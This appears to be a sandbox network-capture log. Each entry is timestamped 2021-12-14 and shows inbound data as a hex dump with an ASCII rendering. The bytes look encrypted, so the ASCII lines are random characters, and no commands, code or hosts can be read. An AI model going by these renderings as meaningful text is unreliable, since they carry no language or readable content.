                                                                                                  2021-12-14 15:13:05 UTC13INData Raw: d4 2a 51 dc 8f 97 c9 c1 83 51 7e 07 47 56 e6 24 11 bc 3c 38 50 48 6f 38 9a 0f e8 5a e7 25 51 40 38 d7 3f c6 6e 50 6a 7f 6e 3f c7 0c 1c aa de 86 63 f3 40 e1 80 83 65 9a 41 bb a3 81 2f ad 42 fd 3d 6f f2 47 5f 3e fa e5 5f 0a 72 e6 1d d0 d5 fc 90 7f 0d 24 6e 4a d1 78 e3 24 8d 15 e9 0c 94 c1 67 9d c4 73 bc 9b be f2 29 b6 9a 8a 02 74 17 10 00 7b 86 d5 3e ef 8c 4d 14 83 9a 5c 54 a2 93 c4 f9 86 c0 f2 58 fc 96 59 24 28 65 fb c8 82 4c 74 3d b0 0e d8 d2 b5 a7 2f e5 e5 52 d0 84 9a 54 ca 1b b7 4a f7 0f 6e 86 82 e6 e2 60 79 da 91 70 87 8a af d2 3a 7d 90 ba a9 e2 5f b0 c8 0a 8e b4 cd 06 17 c3 87 ec ac 3e 4d 0e 8f 20 33 56 2c d0 6a ba 99 82 d8 77 a6 46 41 87 7e 23 79 b3 0b 53 33 4c 67 c4 06 9b 5e 22 d8 59 9d 37 d2 75 da 6a 94 db bc 9f b7 b7 ce 53 20 c6 fe 50 01 ad 4a 81
                                                                                                  Data Ascii: *QQ~GV$<8PHo8Z%Q@8?nPjn?c@eA/B=oG_>_r$nJx$gs)t{>M\TXY$(eLt=/RTJn`yp:}_>M 3V,jwFA~#yS3Lg^"Y7ujS PJ
                                                                                                  2021-12-14 15:13:05 UTC17INData Raw: aa dd d4 16 81 e6 26 86 51 1b 9b 86 09 f5 9d 97 58 99 e5 2d 2b ea ba 6e 66 22 f0 78 b2 62 2c 72 10 88 8d 2e 61 8d e3 50 de 7b 39 ad f2 3a 67 ce 6f 11 da a2 54 c0 48 15 a6 65 a9 f7 39 4a 1c 07 d5 58 d2 58 55 7c e3 e6 55 b1 7d 8f 17 5c b1 7a a8 e8 5c de 65 33 65 c0 a2 34 d8 df 3f c0 1e 7c 1b 5d 27 7c 32 fb 13 7f 3b 7c 30 00 21 47 7c 94 e8 8e 99 55 d4 3b ba 3e 89 66 2d fd 94 69 d9 93 e2 7e 10 f8 c5 af 88 18 75 74 c2 31 d4 4e cc b8 b4 ae 24 74 0b c0 c2 94 c8 e0 8d 24 25 37 7e e7 aa 9b 63 07 06 59 42 2e 55 30 b1 7b 3e 86 d5 bc 30 47 64 e1 fd fc 29 15 ee 9f 06 b6 69 b3 6e cd 80 a7 7a 5e 2f 5e f3 5c 29 80 61 25 7e 38 f4 ae 84 9d b0 ca 04 38 82 e7 47 10 8f 0e 56 b4 4b 9b 65 81 2b c6 e3 1e f4 be c6 85 f4 ce 8e bb f0 6c 7d ee 73 cf 3b 03 14 c8 08 b1 cd 94 73 c3 04
                                                                                                  Data Ascii: &QX-+nf"xb,r.aP{9:goTHe9JXXU|U}\z\e3e4?|]'|2;|0!G|U;>f-i~ut1N$t$%7~cYB.U0{>0Gd)inz^/^\)a%~88GVKe+l}s;s
                                                                                                  2021-12-14 15:13:05 UTC18INData Raw: 1c ff d5 e1 ca 60 b9 33 e1 2d 5a 25 93 fd b2 39 76 e8 1e 02 11 53 94 e8 80 a2 5e fc 03 b0 51 4e b8 2d e6 ba 50 ca ba 2c 7a 7f 38 cd d1 9a c6 79 58 dd 16 d4 44 ee ef 79 ae 2e a0 2d c0 cd c2 6c e0 8d 26 25 3c 7e e7 aa 63 b2 2d 0b 46 75 2e 5f 29 8f 6f 2e be d5 b6 e4 99 75 fb 94 c1 f9 15 e8 fa fa df 97 46 4f 1f a6 82 3b a0 33 79 cb 5c 32 e5 e8 25 6f 3a 00 4a 83 f2 64 a5 c2 32 ed 24 99 1f a0 3f 5f d9 4a 91 76 d1 0d fe e3 1a e9 53 fb bc 3c e4 8a bc d8 40 12 28 75 e7 19 dd 1b eb 31 81 a2 46 79 d0 21 a6 42 cf a6 e5 5c db 2c 64 2c 06 5c 53 cc f1 d8 16 10 8b 10 1c 70 3a ab 59 bb f7 60 4e d3 da fa 08 db 95 64 e6 e8 29 3c 90 f1 0b 67 4d 1f 7d 9d 7e e0 73 97 d0 7a 5a d1 e8 3e 01 a3 d5 04 4b f1 6f 7c 2e 30 b7 0d 2d 5b a5 5b 0b fb 85 0a e0 a4 92 36 6f c3 94 34 7c 58 e5
                                                                                                  Data Ascii: `3-Z%9vS^QN-P,z8yXDy.-l&%<~c-Fu._)o.uFO;3y\2%o:Jd2$?_JvS<@(u1Fy!B\,d,\Sp:Y`Nd)<gM}~szZ>Ko|.0-[[6o4|X
                                                                                                  2021-12-14 15:13:05 UTC19INData Raw: c3 c4 fc 3b ab ad 16 0c 49 a4 d2 6b 09 89 34 29 cd 4d b3 99 3b 39 18 bb ff 34 3f 0d 54 0c 1f 45 33 b5 b5 a5 bc 32 75 13 c4 31 2d 5c a6 02 b6 1a 54 68 08 f8 ee 0c 76 12 cd f3 e9 58 7a 51 dc 8e a5 52 c1 82 5b 61 0d cb 0d ef 24 10 9a a7 38 50 50 4e 4f 98 03 ee 72 7c 3f 51 4a 11 af 3d c6 68 66 f8 7f 6e 3b ef 29 1c 86 dd ae f8 fc 40 eb a8 dc 67 9a 46 93 38 81 2f 9c 63 db 3d 61 f8 6f c4 77 f3 ef 40 0f fe b9 1d ca d4 d4 0a 7f 0d 2e 46 6b da 78 e5 02 16 15 e9 60 b5 b9 65 92 c2 5b 27 81 be f8 00 b2 9a 8a 04 6e 84 10 00 7f e9 b4 3e 6c 8f 65 8f 8c 9a 56 4b b2 1f 9b f8 86 c1 da c3 6e 9f 53 0c 54 67 fb ce 0a de 74 3d b5 19 f0 f2 af a7 29 cc 7e 52 d0 8e 2a 57 46 44 b9 4a f6 27 48 8f 82 ec c5 13 7b da 8d 58 1c 8b af d8 22 55 7c b3 a9 e4 79 2b c8 0a 5e a2 c7 8a 47 c3 87
                                                                                                  Data Ascii: ;Ik4)M;94?TE32u1-\ThvXzQR[a$8PPNOr|?QJ=hfn;)@gF8/c=aow@.Fkx`e['n>leVKnSTgt=)~R*WFDJ'H{X"U|y+^G
                                                                                                  2021-12-14 15:13:05 UTC21INData Raw: 18 4f b5 43 9b cf 39 4b 05 e9 d6 49 50 70 95 7c eb e0 3a 66 6b 84 25 fe be 5f 80 df 5b c3 91 21 62 e3 98 22 db ba 0e c0 0f 7e 19 ff 2c 7c 33 8d 2b 7e 17 70 ed 19 2a 57 51 9f e8 83 90 87 fd 2f b1 3c ec 71 2d ec 96 57 fe 80 f9 73 7f 39 d2 51 83 ea 7b 44 fe 31 d3 58 1a 81 98 a3 2c c5 c2 d1 ca b6 76 d0 30 20 60 ec 75 e7 a7 5e 92 23 02 66 6a 00 5d 23 9a 79 1a 8d d5 b1 f6 b9 74 c5 d3 ea 3e 27 f1 e9 cb b6 6e af 4e c0 84 92 6d 55 25 71 d5 a2 28 a6 bd 0e 6a 08 a3 a4 7b 62 b0 8f c2 38 91 dd 9b 1f 36 26 61 b4 6c 91 76 be 15 ed e7 26 7d 60 c6 94 fc f7 8e a0 0e 6b 3e 20 4b b0 31 dd 1b f6 33 82 cd 85 7d c9 d5 8f 4a ca b0 e3 52 de 00 56 3d 02 41 8b 10 e7 de 1f 18 34 33 37 63 3e a1 5b 82 fb 8d 48 d7 eb d2 3b d1 48 4b ea f1 3a 46 9e e0 0f 7f ab 5e cd 8c 79 8f 05 1a c5 70
                                                                                                  Data Ascii: OC9KIPp|:fk%_[!b"~,|3+~p*WQ/<q-Ws9Q{D1X,v0 `u^#fj]#yt>'nNmU%q(j{b86&alv&}`k> K13}JRV=A437c>[H;HK:F^yp
                                                                                                  2021-12-14 15:13:05 UTC22INData Raw: 09 32 bd 6a 40 a0 c9 8c e1 e4 d0 42 ff 32 d9 b1 25 8d 1f f7 85 52 4c f6 03 b0 08 88 08 ae 45 4d 84 d0 4c 62 32 fd 17 ab aa 3e 77 f7 ac d8 eb 0e 89 34 2d c8 5f bf 98 33 26 12 45 33 10 35 11 d7 19 1f 45 e9 b6 aa ae bc 32 7d 09 20 30 01 4e a0 2a 52 18 b3 66 20 1d e2 0c 70 7d 40 fb e9 52 7f 4a d0 8e b7 4d cc 7d 5a 4d 06 cc 11 ce cd 12 94 a1 9a 4f 4c 4b 4f 90 12 10 73 50 31 57 62 3e ad 3d c0 7e 50 df 7f 6e 3f f9 12 71 aa d4 ae e6 ff 40 e3 b1 38 66 b6 54 95 10 63 2d a7 6c f3 de 6d f8 69 ab 46 fa ef 4a 0a e4 b5 1d d8 cb df f5 7e 21 25 41 25 ad 70 e5 0c 12 b7 f6 0a b0 b9 6d 82 d2 a5 26 b7 b5 ff 1a cc 83 8a 04 1f 2f 0f 11 7d e9 bc 21 e3 78 64 a3 88 9d 41 35 b1 1f 9b fd 24 de d7 cf fc 9e 45 f2 5b 4b f9 d9 a6 d7 7c 22 a8 e7 f1 de b7 8c 2c f5 0e ac 2f 71 af 45 76 40
                                                                                                  Data Ascii: 2j@B2%RLEMLb2>w4-_3&E35E2} 0N*Rf p}@RJM}ZMOLKOsP1Wb>=~Pn?q@8fTc-lmiFJ~!%A%pm&/}!xdA5$E[K|",/qEv@
                                                                                                  2021-12-14 15:13:05 UTC23INData Raw: cc 3f c2 92 50 71 dc fb 47 99 52 19 72 19 9b ad 2f 5c 81 e0 9e c4 76 3f cb 2c c4 66 e8 bf 08 81 af 63 c0 4c 91 02 58 5b c3 32 53 1b d9 dc 5f 24 71 b9 7e f4 ed 3a 7e 61 71 1c ae bc 74 82 f4 cb d9 78 f6 45 ef 92 05 79 c3 cb c0 0f 67 03 e2 27 da 34 94 d5 51 3b 76 ff 19 17 6b 73 1b e8 84 8a 79 ed 07 a3 c0 82 94 22 fa e2 64 cd 92 e6 f6 c8 29 1f a2 8e dc 6a 58 f5 20 d0 58 1a 81 98 ab 39 80 16 c2 ce bc 64 e4 97 dc 4b dd 7b cc ca 5e 7f 26 2e 7f 46 39 a1 22 b0 50 1e 95 d1 b6 ff 43 6d 17 d4 c5 3b 6b ca f0 c0 b2 41 46 b0 c1 a2 ff 17 5e 25 7c c1 45 3a 8e bf 34 6b 2b 22 5a a8 86 b0 ca c5 39 82 e7 e7 3a aa 26 65 bc d1 87 5e 81 03 fe e9 08 00 61 ea 89 e0 f5 8e ba e1 6e 04 d6 72 e3 32 ca 08 e9 20 97 c9 89 87 d1 07 8c 4d ca 9e 83 b7 32 fb 5e 3b d0 56 7d 18 fa 1a 00 3a ae
                                                                                                  Data Ascii: ?PqGRr/\v?,fcLX[2S_$q~:~aqtxEyg'4Q;vksy"d)jX X9dK{^&.F9"PCm;kAF^%|E:4k+"Z9:&e^anr2 M2^;V}:
                                                                                                  2021-12-14 15:13:05 UTC24INData Raw: 94 47 fb a6 f2 8f f6 4e 2c fb 0f 14 e6 95 dd 8f 70 1d 60 3f fb 4e 13 cf c2 3d be 61 f2 69 05 a4 b6 cc 2f 29 32 bd 66 af 55 c9 8c ef 56 6b 41 ff 38 d1 b7 5c be 0e 96 82 ac 4d de 2c bf 11 8e ac 99 71 41 84 d2 d3 7b cc fc 3f 78 8a 15 0c f7 ae cd 1d 35 90 4a 21 d7 4d b7 b0 32 3a 18 bd 1a 18 3f 0d 50 8c 17 45 e8 b9 68 ac b3 32 75 11 c1 46 1e 44 d8 0a b6 1a b7 48 02 fb e0 0a 5e 36 38 fb e3 d8 7d 51 dc 8a 62 b9 c3 83 5b 63 12 b3 3a ff 5a 18 94 a7 3c 78 49 44 4f 9e 27 ca 72 7c 2f d1 42 10 af 39 1b a5 7a f1 7f 6c 2a 96 1a 05 d4 dc ae f8 f7 68 e7 ab c6 61 b2 63 93 38 8b af af 6a db 39 b2 57 6d c4 3e f8 f0 3a 33 e7 c7 15 d0 d4 d0 23 72 0e 2e 40 1b f7 78 e5 06 96 1d e9 06 b8 64 f4 9f c2 5b 25 84 c5 cb 18 cc 92 8a 04 1f a5 1e 03 71 ef 9c 1a ef 86 6f 0f 8b 9a 56 4f 75
                                                                                                  Data Ascii: GN,p`?N=ai/)2fUVkA8\M,qA{?x5J!M2:?PEh2uFDH^68}Qb[c:Z<xIDO'r|/B9zl*hac8j9Wm>:3#r.@xd[%qoVOu
                                                                                                  2021-12-14 15:13:05 UTC26INData Raw: 50 0b f8 20 2a 43 75 8c d8 be ae eb 0f f6 fd 8f 98 33 c7 1d 94 24 35 8c 59 22 49 99 31 0d f3 7d 5f 88 f5 f8 3b f6 81 42 66 33 e1 74 90 b4 15 5e 15 a8 4c 22 63 9e cb a0 c5 64 2c 3c 35 16 6d d5 ba 04 29 99 68 df 5c 0c ae 4f 90 d4 26 53 e8 d8 f9 43 cb 7b 8f aa f0 eb 25 6d 6e 94 1d 93 a5 40 ac 21 5d f2 7a 08 5c e9 9a 3e da c4 ea d1 17 1b 20 e0 27 76 27 83 ca 52 28 6d ee 1e 1f 70 6a 6a e9 a8 81 68 f7 12 b4 e8 90 b3 32 ce 8f 5a cd 83 f9 67 5c c0 c4 83 88 d7 72 46 23 22 df 5b c0 93 af ae 3f b1 17 2f cb 90 7c f1 86 38 9c e2 75 fa b3 5e 6c 33 35 75 bc 2f 73 2e 9e 42 0d ae c4 b7 ee 4d 66 e1 c9 fa 33 15 f9 eb d7 48 68 95 b3 d9 bb 8b 7a 4f 3e 69 ed a2 28 a6 b1 27 7e 3b f4 4f 85 9d bc b6 d7 27 a5 fe 82 1f bb 3d 7e a0 b5 90 5a a2 01 ef e8 36 ef 61 c6 9e f0 f9 9f a9 eb
                                                                                                  Data Ascii: P *Cu3$5Y"I1}_;Bf3t^L"cd,<5m)h\O&SC{%mn@!]z\> 'v'R(mpjjh2Zg\rF#"[?/|8u^l35u/s.BMf3HhzO>i('~;O'=~Z6a
                                                                                                  2021-12-14 15:13:05 UTC27INData Raw: b7 d5 fc be 72 da 80 d2 2e fa 83 b1 25 0b fd 02 bd 47 91 f3 a8 ff 3a a8 d8 83 6f 43 90 f4 29 7e 7a 2c a7 92 4e f9 b1 d5 ba f0 21 35 7a 07 1e f5 99 11 e3 62 1b b6 2e eb 38 31 d9 94 21 bf 61 fc 4b 13 a8 ac 1c 14 02 30 ac 63 07 49 c8 8c e1 80 3f 4d e5 ee c0 a7 2b 9c 18 c0 9e ad 4d d0 17 a6 03 81 b0 67 46 4e 95 c9 44 a9 db 2a b6 8e ad 16 0d e4 bc d0 7a 09 98 24 3f c6 5c 9b 8e 3a 39 12 aa 3d 2d 2e db 49 03 1d 54 e7 95 a1 a4 b0 38 66 1d cf 3e 37 4c a8 d4 60 09 bc 62 19 f7 c8 18 77 12 32 f7 f8 57 6f 87 cf 81 bd 43 ce ab 4f 60 0d c1 04 f7 2b 0a 42 b4 37 52 53 48 67 8c 0e ee 78 6f 28 40 45 0a be 30 10 be 6b fe 7d 7f 3a c7 3d 1d aa de bd fd e2 4f f1 7e d5 68 8b 42 84 e2 96 f9 2a 41 db 3d 6e eb 6b c6 2f f5 fe 44 16 ef bc 35 c6 d5 d4 01 7c 1c 22 29 2f d2 78 ef 35 3a
                                                                                                  Data Ascii: r.%G:oC)~z,N!5zb.81!aK0cI?M+MgFND*z$?\:9=-.IT8f>7L`bw2WoCO`+B7RSHgxo(@E0k}:=O~hB*A=nk/D5|")/x5:
                                                                                                  2021-12-14 15:13:05 UTC28INData Raw: cf 4d a2 6b 19 d7 ec e0 34 51 9d d4 04 c3 3a a2 04 4e 20 10 20 55 05 76 25 59 66 1a 32 83 81 89 b6 c1 cb 58 ea f3 1f 33 68 66 bc 1f a7 52 64 94 ee ec ac db e5 d4 10 a1 23 16 9e 59 46 53 86 09 c4 f2 51 49 9a c7 c3 25 cf 98 4e eb 7d fa 6b 9a 59 1e 63 1a 94 2d 1f 71 85 c1 2c cf 71 50 f0 35 3a 6d d7 b5 36 ed 8b 63 ca 4a 70 2d 4f 81 c5 2a 4f 3e cb d4 49 d0 61 91 13 7b e0 3a 7d 6e 89 0c 84 aa 77 01 dd 5c d8 79 ad 49 e8 9a 35 cc c1 f5 e8 ac 74 33 eb 3f f0 0b 94 d5 7e 13 45 ef 0f 0e 78 c7 ab e8 84 8b 51 51 03 ba 34 ab e2 2d ec 96 56 1b 1f c9 78 7f 3f d6 a8 93 c0 6d 74 ed 32 d4 42 fc 0d b3 ae 2e ab 18 da db b7 63 f1 8a 80 5b fa 69 f1 2c 7a 6c 22 2f cc 53 25 4c 2f 8d 5f 12 92 cd 3b c1 47 75 e8 c6 e4 39 18 fe e7 5c a7 64 ae a6 5d b9 9d 6d 76 82 76 cb 56 0f 9b b2 33
                                                                                                  Data Ascii: Mk4Q:N Uv%Yf2X3hfRd#YFSQI%N}kYc-q,qP5:m6cJp-O*O>Ia{:}nw\yI5t3?~ExQQ4-Vx?mt2B.c[i,zl"/S%L/_;Gu9\d]mvvV3
                                                                                                  2021-12-14 15:13:05 UTC29INData Raw: cd 4c db 86 91 b5 8c 05 c1 08 4b c0 bc 04 2a 9f d3 21 af 9c f1 74 3b eb 3b f3 94 c0 5f bf e9 e0 3b 0a 8b bf e8 ff 91 72 dd 91 cf 52 c9 93 be 35 03 f4 0a b5 8b 93 da bc fe 3d a8 16 83 7f 4c 8a 33 2f 5d 55 2f b3 fd 13 fb a0 d0 77 ce ae 26 7b 07 1c c6 92 66 ec 73 5d b1 3d e4 3a 29 f6 b5 b5 be 61 b6 87 02 a7 b6 b9 21 0c 32 b7 7f 0d 43 44 a7 eb 8b 2f 51 dc 27 cb 25 02 8d 17 e9 99 88 5c df 1b af 03 ad bc af 7d 57 85 d8 59 62 c9 ea 2a 81 bb 09 14 df ba d3 6b 0c 98 16 38 f3 22 94 99 3b 33 09 99 23 1f 50 25 5b 0c 15 54 ca aa da 8c b1 32 7f 02 fc 28 42 77 a7 02 bc 0b 91 0f 23 f9 e0 06 67 16 2e ea ed d6 c2 3e f0 8f bf 58 d2 a6 44 21 80 e0 09 e6 25 03 b5 b6 1d 4f 6a 56 6e 8e 10 ae 5a 6a 24 51 40 63 8a 3c c6 62 6b d7 6e 48 24 ce 46 3e ab d4 a4 eb d4 51 cc 80 d3 66 9a
                                                                                                  Data Ascii: LK*!t;;_;rR5=L3/]U/w&{fs]=:)a!2CD/Q'%\}WYb*k8";3#P%[T2(Bw#g.>XD!%OjVnZj$Q@c<bknH$F>Qf
                                                                                                  2021-12-14 15:13:05 UTC31INData Raw: 4d 73 d9 e9 90 64 27 e8 43 9d 30 ce 29 ca 4c 81 d3 93 13 8f af 30 53 ae d5 df 4a 3b 49 ea 8f c8 40 f7 4e e6 41 89 4c bb ce f1 04 2a 6d 13 f3 08 c3 33 18 eb 45 1f 1f 29 54 08 6e 3e dc 5f e4 33 ae 90 92 ab cd d5 56 88 e3 3f 26 55 f8 86 cb bd 47 76 32 f0 f5 92 1e f4 d8 0c 9d a4 37 9b 4e 1b f5 86 09 f9 d4 4d 4b 96 ef e2 2b d0 81 a7 67 1b 61 6b 9b 4a 00 a2 91 82 53 2f 58 91 cb b1 d4 53 24 c1 34 3c 7c 49 b6 1e ff 8b 70 cb 59 14 a3 48 a9 de 39 4a 1c 7b c4 42 cd 6f a9 f0 dc e0 3a 76 df 9e 16 9a af 5b a8 ce 5c de 65 82 5f e3 83 22 54 ea e1 c0 0e d6 22 ea 3d 6d 30 87 d8 6e 36 62 c6 8e 06 6f 4d 82 65 83 8a 79 fd 17 ae 2a ab 1b 2d ec 96 69 dc 92 e2 72 dd 2f ce bc 88 d7 73 48 e1 2a 59 6b e4 80 b5 bd 22 bb 07 c7 dd 20 64 ec 9a 34 d6 e0 72 ff b7 d9 7d 2e 37 78 de 3f 53
                                                                                                  Data Ascii: Msd'C0)L0SJ;I@NAL*m3E)Tn>_3V?&UGv27NMK+gakJS/XS$4<|IpYH9J{Bo:v[\e_"T"=m0n6boMey*-ir/sH*Yk" d4r}.7x?S
                                                                                                  2021-12-14 15:13:05 UTC32INData Raw: 6d c3 12 71 17 68 e1 4b 71 8f dd 8b 01 a7 11 06 e5 97 d6 0e 51 a4 10 a6 84 a9 08 25 f9 50 cf 38 09 e4 2d cb 0b de 9a 8f 94 81 fa c0 2e 67 81 b5 1d 21 b7 f4 3f 51 9b b2 09 3c c7 66 fd b9 d1 49 b9 37 8e 0e 09 93 b8 c4 fa 88 9d da ac dd 2a d9 8d b7 32 dd e7 17 41 57 b2 df 97 b5 21 af cb 8c 63 b2 8b 0e 32 74 57 74 b1 44 10 e5 ad da a2 ed b0 27 57 0d 16 e3 db 91 f3 79 2e 7b 21 e9 3a 29 c0 42 34 92 63 e1 4c 02 ae a9 c3 f9 0c 1e bf 47 2d 76 4d 9b e0 a0 24 40 fa 72 42 b7 24 a3 15 fe 81 a9 68 90 13 61 46 8b e0 b9 64 89 92 f2 53 73 df cc 39 a5 90 16 0c f7 ef d2 6b 17 9f 38 02 f8 4d bb 8f c5 38 34 b9 2a 30 3f 05 42 f2 1e 69 e5 c3 82 a5 b0 36 06 58 df 31 27 56 bf 0e b6 12 a5 9e 09 d4 e2 1b 7a 12 30 e2 17 59 59 53 f7 8c 94 9d c6 81 34 2d 0c cb 03 cc 24 10 94 b4 08 52
                                                                                                  Data Ascii: mqhKqQ%P8-.g!?Q<fI7*2AW!c2tWtD'Wy.{!:)B4cLG-vM$@rB$haFdSs9k8M84*0?Bi6X1'Vz0YYS4-$R
                                                                                                  2021-12-14 15:13:05 UTC33INData Raw: 39 ab c7 8a 0f c3 87 fc 87 b2 14 4b 81 08 af 56 2e da 40 a9 e2 80 d8 25 b2 46 41 8f 7c 23 68 a5 2b 31 2c 64 34 d2 f8 90 1d 75 c1 52 97 3a c2 05 6c 4d bd 8e 9f 08 b0 af 3a 56 63 5c d5 52 20 5d 4c 89 d3 5d 6f 75 0f 4a 8e 5a c3 c8 2d 93 1e 7d 9f cd 02 c5 24 ab fe c1 bb a0 a4 4e 18 6c 23 46 61 e0 bd 18 ab 88 bb c1 c9 6a 1f da 1d 33 43 62 e4 91 a4 50 e0 59 e0 eb 52 95 3f c3 c0 06 13 26 97 58 3e 5b 90 12 6f fb 46 5a 2d 73 fa 3d cc 26 c5 60 34 f3 71 9c 62 02 73 10 88 5a 27 fe 32 d3 6b db 17 1c c2 34 3a 67 c4 b1 6e bf d1 4b 51 48 1f bf fb 1d c6 30 c4 a1 ce 0f 4c fa 70 94 7c e3 bd 8e eb 74 a5 1d 82 be 4c b0 da 5c 57 6f 20 4e a0 9a 34 c9 fd 76 c0 0f 7e 31 8e bf 7c 34 9e d8 76 b5 c1 ce f0 04 6f 4b a5 e3 ac aa 7a fc 05 c9 69 82 b8 27 96 b4 d6 cd 92 e8 7b 10 a6 c5 af
                                                                                                  Data Ascii: 9KV.@%FA|#h+1,d4uR:lM:Vc\R ]L]ouJZ-}$Nl#Faj3CbPYR?&X>[oFZ-s=&`4qbsZ'2k4:gnKQH0Lp|tL\Wo N4v~1|4voKzi'{
                                                                                                  2021-12-14 15:13:05 UTC34INData Raw: 1f aa d2 86 df f3 40 e1 c7 5e 67 9a 4d 98 3a a9 66 a7 6a d1 49 5c f8 6f c5 2d f2 fe 48 28 d0 ba 1d d6 d2 fc 2f 7f 0d 24 29 c0 d3 78 ef 1d 1e 3d 37 04 bc bf 0a cd c2 5b 2d 8a b6 ef 6e fe 9a 8a 0e 0a 85 38 4a 71 e9 be 51 a4 86 65 85 92 92 39 be a8 1f 91 ea 80 e9 f5 c0 fc 90 5f 02 5f 08 a7 cf aa dd 1b 60 bb 19 fa e1 a1 8c 60 dc 6a 3d 12 8e 85 54 6e d8 b7 4a fc 34 f9 97 84 eb dc 14 f5 6d f8 f1 1c 8a a5 d0 33 59 be bf b8 e8 18 75 c9 0a 8e 83 98 8b 48 c9 94 e7 ac 32 4d 0e 8f 19 a5 39 b4 da 40 a3 ba 8b c9 23 b7 4d 57 9e 75 ad df ca a9 78 28 46 71 c7 97 5d 72 20 ca 7f 33 ee d2 9a cf 33 ad cc b7 9e 9c a3 21 46 79 ff d5 52 2b 21 1f 9e c2 53 3d d3 df 46 9f 4a 97 68 94 b7 35 7d 95 e4 38 c0 32 bc e9 4a 1d 11 3d 5c 12 7e 0d 31 71 e4 39 a2 ab 09 ba c1 c9 48 7b 6a 33 31
                                                                                                  Data Ascii: @^gM:fjI\o-H(/$)x=7[-n8JqQe9__``j=TnJ4m3YuH2M9@#MWux(Fq]r 33!FyR+!S=FJh5}82J=\~1q9H{j31
                                                                                                  2021-12-14 15:13:05 UTC35INData Raw: f1 7e e7 a0 47 6c 2c 2e 0c 32 2e 55 23 9c 53 06 9d e5 b2 ee 3d 75 e9 d5 a4 28 15 f9 e4 cb c5 08 b8 b0 cb a4 e3 18 5f 25 7c c6 5e 52 c2 bf 25 6b 23 da 28 a2 9c b6 af d1 3d 93 e8 88 19 c5 01 60 b4 41 80 73 b7 6c d7 e2 1e f4 71 c3 8c 93 cc 8b ba fa 69 3a 4e 72 cf 3b ce 1f fc 25 e9 e6 95 79 da 38 89 77 c8 b7 eb 5e dc 00 d8 9b 69 76 74 11 c1 d2 c8 0a bf 3d 44 14 3b a1 40 8f 8c 16 48 fb e8 26 d6 db 41 6d e1 e1 46 15 9e f1 01 bf 5d 58 8e 8a 7f e0 62 30 c5 7a 5b cc fb 7e 12 e3 fd 2c 9e ab 6f 74 8c 21 f7 1a 51 4c ab 5b 55 bb c0 02 e0 a2 ba 61 76 f3 96 5b 83 58 e5 4b a2 8f dd 9a 57 ac 62 76 f2 9a e4 78 22 c6 11 a6 87 bd ff 2c dd 5d a5 2c 0c f3 fd a8 c7 c4 97 85 f2 bb 05 c1 08 70 91 cd 22 2d b7 f7 30 aa 8b 9b 1d 3d 84 16 e1 b4 db 51 ab d1 e0 0b 0a 8b bf d5 f6 8e 0c
                                                                                                  Data Ascii: ~Gl,.2.U#S=u(_%|^R%k#(=`Aslqi:Nr;%y8w^ivt=D;@H&AmF]Xb0z[~,ot!QL[Uav[XKWbvx",],p"-0=Q
                                                                                                  2021-12-14 15:13:05 UTC37INData Raw: a5 60 21 ce 0d ea 3e 03 93 a7 29 57 5d 4a b1 99 23 e5 63 7a 1c b3 4a 10 af 22 c8 7b 7f f1 6e 69 2d 11 28 30 a0 d7 b8 b8 3c 40 eb a8 df 74 9d 47 82 3f 9f d1 a6 46 ec 34 6a ff e3 d4 3e fa ed 2f 73 ff b9 17 f8 a0 d5 0b 75 28 03 43 15 c2 7c ce 06 6f 05 e9 06 be c8 75 9d c2 59 34 9e ac fd 7a e4 9a 8a 00 9f e2 b2 00 71 ef ab 37 fc 81 65 9e 84 86 a8 4a 84 16 e5 b5 86 c1 de ce e1 85 54 0c 4b 60 e0 30 ab fb 6c 35 9a 1d f1 f2 b5 8f 39 cc 7e 58 f8 ff 84 5e 4c 7d f0 b5 09 d8 e9 95 85 ec db 14 64 d1 69 59 30 9c a7 f8 27 54 b0 ba 81 f4 76 2b c2 22 f5 aa c7 80 64 82 98 e1 97 a2 4d 1f 82 17 a3 a8 2d f6 4b d7 e4 80 d8 21 b5 40 5e 82 6d 24 68 b4 07 65 d6 4d 4c d5 f1 b6 6c 3e d3 55 9d 21 c3 9d 25 47 ba cf a0 8c b7 af 21 55 13 cb 2b 53 06 4c 63 9b fa 38 1f 3d 26 3f fb 4c 19
                                                                                                  Data Ascii: `!>)W]J#czJ"{ni-(0<@tG?F4j>/su(C|ouY4zq7eJTK`0l59~X^L}diY0'Tv+"dM-K!@^m$heMLl>U!%G!U+SLc8=&?L
                                                                                                  2021-12-14 15:13:05 UTC38INData Raw: 2d ea b4 ff cd 92 e8 17 45 3f c5 a5 84 ee 39 5f f5 37 aa 24 e4 80 b0 86 6f a9 0b d7 e2 02 75 e0 87 4d 70 f0 7e ed a6 6d f1 20 2e 68 3c 4e 5f 23 98 7b 98 84 d5 b0 c6 f9 75 e9 df 86 12 14 e8 fa c6 9e f6 bb b0 c7 d6 f0 7a 5e 21 5e 6b 5e 29 8c 97 9b 6f 30 d6 34 be 9c b6 af c4 10 c0 ee 99 19 d4 46 61 b4 4f b9 dc ad 03 f8 cb a0 fe 60 cc fb c6 e7 8a b0 f6 42 b1 2a 73 c9 4f bd 1b ed 24 ae 69 96 79 d6 03 30 66 cf ac 80 72 cc 04 5c 2a 69 24 74 11 c1 b6 69 11 ae 32 38 77 11 c2 58 81 cb f3 48 fb e8 f6 0e d9 27 5c e6 e8 23 4f 97 d9 24 63 55 55 cc 9f 55 a9 61 32 76 7a 5a d6 e8 7a 01 e7 4d 9b 92 c2 55 6b 88 32 fe 0c 40 44 8e 72 1e da d1 00 7a b1 bc 70 6b c4 ba 7f 04 58 ef 58 ea 9e d8 a3 72 a7 11 1d df 93 ff 71 59 ad 38 17 8d b0 f0 35 dd 4e 1c 28 05 e2 ff d6 56 4a 20 bd
                                                                                                  Data Ascii: -E?9_7$ouMp~m .h<N_#{uz^!^k^)o04FaO`B*sO$iy0fr\*i$ti28wXH'\#O$cUUUa2vzZzMUk2@DrzpkXXrqY85N(VJ
